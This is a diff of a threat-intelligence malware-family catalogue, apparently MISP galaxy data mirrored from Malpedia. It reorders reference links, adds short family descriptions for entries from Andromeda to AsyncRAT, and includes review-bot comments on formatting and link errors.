@@ -12874,28 +13485,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", - "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", - "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", - "https://blog.avast.com/andromeda-under-the-microscope", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", - "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", - "http://blog.morphisec.com/andromeda-tactics-analyzed", - "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", - "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", - "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", - "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", - "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + 
"https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", - "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/" + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/" ], "synonyms": [ "B106-Gamarue", 
@@ -12909,20 +13520,21 @@ "value": "Andromeda" }, { - "description": "", + "description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The \u201cAndro\u201d part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and \u201cMut\u201d is based off a mutex that the analyzed sample creates: \u201cmutshellmy777\u201d.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://intel471.com/blog/a-brief-history-of-ta505", + "https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf" + 
"https://intel471.com/blog/a-brief-history-of-ta505" ], "synonyms": [ "Gelup" @@ -12937,11 +13549,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf" + "https://www.secureworks.com/research/threat-profiles/bronze-riverside" ], "synonyms": [ "UPPERCUT", @@ -12986,9 +13598,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/", "https://twitter.com/MsftSecIntel/status/1298752223321546754", - "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/", - "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/" + "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/" ], "synonyms": [ "Anubis Stealer" 
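Review bot: The new AndroMut description keeps a footnote marker from the Proofpoint source, `known as Andromeda [1]`, that has no referent anywhere in this file, so every consumer will render a dangling `[1]`. Drop the marker: `known as Andromeda and \u201cMut\u201d is based off a mutex`. If this cluster is regenerated from Malpedia the cleanup belongs upstream, otherwise the next sync will reintroduce it.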
@@ -13003,10 +13615,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis_loader", - "https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/", - "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", - "https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/", "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/", + "https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/", + "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e", + "https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/", "https://windowsreport.com/kraken-botnet/" ], "synonyms": [ @@ -13076,11 +13688,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle", "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/", - "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf", - "https://assets.sentinelone.com/sentinellabs/evol-agrius", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/", + "https://assets.sentinelone.com/sentinellabs/evol-agrius", "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/", - "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/" + "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf" ], "synonyms": [], "type": [] 
@@ -13093,21 +13705,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", - "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://twitter.com/VK_Intel/status/1182730637016481793", + "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", "https://www.telsy.com/download/5394/?uid=28b0a4577e", - "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", - "https://twitter.com/VK_Intel/status/1182730637016481793" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023" ], "synonyms": [], "type": [] 
@@ -13120,24 +13734,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", - "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", - "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf", - "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf", - "https://www.youtube.com/watch?v=rfzmHjZX70s", - "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", - "https://asec.ahnlab.com/ko/26705/", - "https://asec.ahnlab.com/en/36368/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", - "https://www.telsy.com/download/5654/?uid=4869868efd", - "https://asec.ahnlab.com/en/30532/", - "https://asec.ahnlab.com/ko/36918/", - "https://asec.ahnlab.com/en/41015/", "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf", + "https://asec.ahnlab.com/en/36368/", + "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.youtube.com/watch?v=Dv2_DK3tRgI" + 
"https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf", + "https://asec.ahnlab.com/ko/36918/", + "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf", + "https://www.telsy.com/download/5654/?uid=4869868efd", + "https://asec.ahnlab.com/ko/26705/", + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://asec.ahnlab.com/en/41015/", + "https://asec.ahnlab.com/ko/54804/", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf", + "https://asec.ahnlab.com/en/30532/", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", + "https://www.youtube.com/watch?v=Dv2_DK3tRgI", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf" ], "synonyms": [ "JamBog" 
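Review bot: Among the three boho.or.kr references in the new Appleseed ref list, `attach_file_seq=2651&attach_file_id=EpF2652.pdf` pairs sequence 2651 with file id 2652, while the other two pair 2652/EpF2652 and 2651/EpF2651 consistently; it looks like a malformed duplicate of one of them rather than a third document. It is worth confirming that the URL resolves to a distinct report before keeping it, since a dead or wrong-document link in a threat-intel feed misleads more than it helps. If the list is generated from Malpedia, the fix is upstream.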
@@ -13148,7 +13763,7 @@ "value": "Appleseed" }, { - "description": "", + "description": "According to f-secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product's website.& When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.\r\n\r\nThis program can be configured to a complete stealth mode, with password protection, to avoid user detection.\r\n\r\nThe information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax", @@ -13175,7 +13790,7 @@ "value": "Arefty" }, { - "description": "Malware derived from the source code of win.kronos.", + "description": "A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ares", 
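Review bot: The new Ardamax description carries a stray ampersand, `from the product's website.& When run`, which reads like an HTML entity (probably `&nbsp;`) that was truncated when the f-secure text was scraped. It should be `from the product's website. When run, the program can capture a range of user activities`. If this cluster is regenerated from Malpedia, the correction belongs upstream or in the generator's text cleanup, otherwise the next regeneration will bring the artifact back.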
@@ -13189,14 +13804,14 @@ "value": "Ares (Windows)" }, { - "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", + "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums \u201cRAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed \u201cProject Ares,\u201d was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer \u201cCerberSec.\u201d\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. 
Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader", - "https://intel471.com/blog/new-loader-on-the-bloc-aresloader", - "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html", "https://flashpoint.io/blog/private-malware-for-sale-aresloader/", "https://twitter.com/k3dg3/status/1636873721200746496", + "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html", + "https://intel471.com/blog/new-loader-on-the-bloc-aresloader", "https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/" ], "synonyms": [], @@ -13210,8 +13825,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch", - "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/", - "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions" + "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions", + "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" ], "synonyms": [], "type": [] 
@@ -13226,8 +13841,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody", "https://medium.com/insomniacs/aria-body-loader-is-that-you-53bdd630f8a1", "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", - "https://securelist.com/it-threat-evolution-q2-2020/98230", - "https://securelist.com/naikons-aria/96899/" + "https://securelist.com/naikons-aria/96899/", + "https://securelist.com/it-threat-evolution-q2-2020/98230" ], "synonyms": [], "type": [] @@ -13240,9 +13855,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher", - "https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant", + "https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks", - "https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/" + "https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant" ], "synonyms": [], "type": [] 
@@ -13283,18 +13898,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", - "https://isc.sans.edu/diary/rss/28468", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://threatmon.io/arkei-stealer-analysis-threatmon/", + "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", "https://forensicitguy.github.io/analyzing-stealer-msi-using-msitools/", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://ke-la.com/information-stealers-a-new-landscape/", "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets", - "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view" + "https://isc.sans.edu/diary/rss/28468", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://threatmon.io/arkei-stealer-analysis-threatmon/", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" ], "synonyms": [ "ArkeiStealer" 
@@ -13305,7 +13920,7 @@ "value": "Arkei Stealer" }, { - "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", + "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It\u2019s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat", @@ -13322,9 +13937,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/", "https://twitter.com/Racco42/status/1001374490339790849", - "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/" ], "synonyms": [], "type": [] 
@@ -13352,12 +13967,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", "https://www.freebuf.com/articles/database/192726.html", - "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/", - "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english", - "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", - "https://securelist.com/apt-trends-report-q1-2021/101967/" + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" ], "synonyms": [], "type": [] @@ -13407,8 +14022,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", - "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" ], "synonyms": [ 
@@ -13425,8 +14040,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] 
@@ -13439,21 +14054,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", - "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", - "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", - "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", - "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://blog.easysol.net/meet-lucifer-international-trojan/", "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962", "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/", - "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt", - "https://blog.easysol.net/meet-lucifer-international-trojan/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", + 
"https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", "https://isc.sans.edu/diary/27482", - "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/" + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [ "Guildma" @@ -13463,6 +14078,19 @@ "uuid": "0cdb83dd-106b-458e-8d04-ca864281e06e", "value": "Astaroth" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.astasia", + "https://twitter.com/MalGamy12/status/1690100567756906497" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6cc38bdd-f7ac-4775-bc41-69e72b761ab5", + "value": "Astasia" + }, { "description": "", "meta": { 
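Review bot: The new Astasia entry lands with `"description": ""` and a single tweet (`https://twitter.com/MalGamy12/status/1690100567756906497`) as its only reference besides the Malpedia page, so a consumer of the galaxy gets a name and a UUID but nothing to characterise the family with, and the one primary source is the kind of link that tends to disappear. Because this cluster mirrors Malpedia, the gap is presumably upstream rather than in this patch; a one-line description taken from the Malpedia page, or at minimum an archived copy of the tweet, would make the entry usable before the link rots. The Astaroth hunk that precedes it on these lines is a pure reorder of existing refs.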
@@ -13480,94 +14108,98 @@ "value": "AstraLocker" }, { - "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", + "description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim\u2019s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", - "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + 